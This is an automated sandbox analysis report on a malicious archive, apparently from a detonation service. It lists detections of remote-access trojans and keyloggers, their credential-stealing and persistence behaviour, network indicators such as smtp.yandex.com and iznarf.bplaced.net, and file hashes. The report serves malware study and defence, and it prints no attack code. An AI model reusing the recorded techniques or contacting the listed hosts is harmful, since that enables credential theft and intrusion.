Analysis Overview
SHA256
6681cb73deb0effc4f44f704c6bddb07e98c1f8da4c8478cca7ddd49abdb0c3f
Threat Level: Known bad
The file archive_7.zip was found to be: Known bad.
Malicious Activity Summary
Umbral
Xenorat family
Detect XenoRat Payload
Umbral family
Dcrat family
Xworm
Remcos
DCRat payload
UAC bypass
Vipkeylogger family
Process spawned unexpected child process
Quasar RAT
Quasar payload
VIPKeylogger
DcRat
Remcos family
Njrat family
Xworm family
Detect Umbral payload
njRAT/Bladabindi
Quasar family
Detect Xworm Payload
DCRat payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Reads WinSCP keys stored on the system
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Browser Information Discovery
Program crash
Detects videocard installed
Checks processor information in registry
outlook_office_path
Uses Task Scheduler COM API
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
System policy modification
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-22 06:18
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Dcrat family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Xenorat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral23
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
144s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2872 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 2872 set thread context of 1032 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe
"C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
Files
memory/784-0-0x0000000074841000-0x0000000074842000-memory.dmp
memory/784-9-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-1-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-10-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-11-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-23-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-24-0x0000000074840000-0x0000000074DEB000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 52fb55a1222aba62a80fe4888cd5f0a0 |
| SHA1 | db6bda74d90463c533a29e49cc715242661d562e |
| SHA256 | e0c3c50f574a2d872991aec7082e075f3813e8c913c679a8e4f5e1d3606eeafd |
| SHA512 | 747447b49572c1cb74fdb18d3551beff0e4065270555e1459f13353a8b4c3af7e1bc95ae601d56556728f95717c103b9e8a798d937e34a19c45b04089902d3d8 |
memory/2872-32-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/784-31-0x0000000074840000-0x0000000074DEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabD153.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2872-40-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/2872-41-0x0000000074840000-0x0000000074DEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarDEFB.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
memory/1784-67-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1784-65-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1784-63-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1032-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1784-74-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1784-73-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1784-72-0x0000000000400000-0x0000000000410000-memory.dmp
memory/1784-71-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1784-69-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2872-87-0x0000000074840000-0x0000000074DEB000-memory.dmp
memory/2872-90-0x0000000074840000-0x0000000074DEB000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
74s
Max time network
148s
Command Line
Signatures
DcRat
Dcrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe
"C:\Users\Admin\AppData\Local\Temp\1bb302f6b26022b9f405c4a06c165b236837688e94ea312a231c8f780e63d2b3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2836-0-0x00007FFF45053000-0x00007FFF45055000-memory.dmp
memory/2836-1-0x00000000003A0000-0x00000000005AA000-memory.dmp
memory/2836-2-0x00007FFF45050000-0x00007FFF45B11000-memory.dmp
memory/2836-3-0x0000000000EB0000-0x0000000000EBE000-memory.dmp
memory/2836-4-0x0000000000EC0000-0x0000000000ECE000-memory.dmp
memory/2836-6-0x00007FFF45050000-0x00007FFF45B11000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250313-en
Max time kernel
123s
Max time network
145s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Protector.exe" | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe
"C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
Files
memory/32-0-0x00007FF8477F5000-0x00007FF8477F6000-memory.dmp
memory/32-1-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-2-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-3-0x000000001BC50000-0x000000001C11E000-memory.dmp
memory/32-6-0x000000001C2D0000-0x000000001C332000-memory.dmp
memory/32-7-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-5-0x000000001C1C0000-0x000000001C25C000-memory.dmp
memory/32-4-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-9-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-8-0x0000000000D10000-0x0000000000D18000-memory.dmp
memory/32-10-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-13-0x00007FF8477F5000-0x00007FF8477F6000-memory.dmp
memory/32-14-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
memory/32-15-0x00007FF847540000-0x00007FF847EE1000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
18s
Max time network
118s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Executes dropped EXE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe
"C:\Users\Admin\AppData\Local\Temp\1b0acebe24bf7a0fa1e25e0e9174184ad9827298b7ff75384049deed6e74c306.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
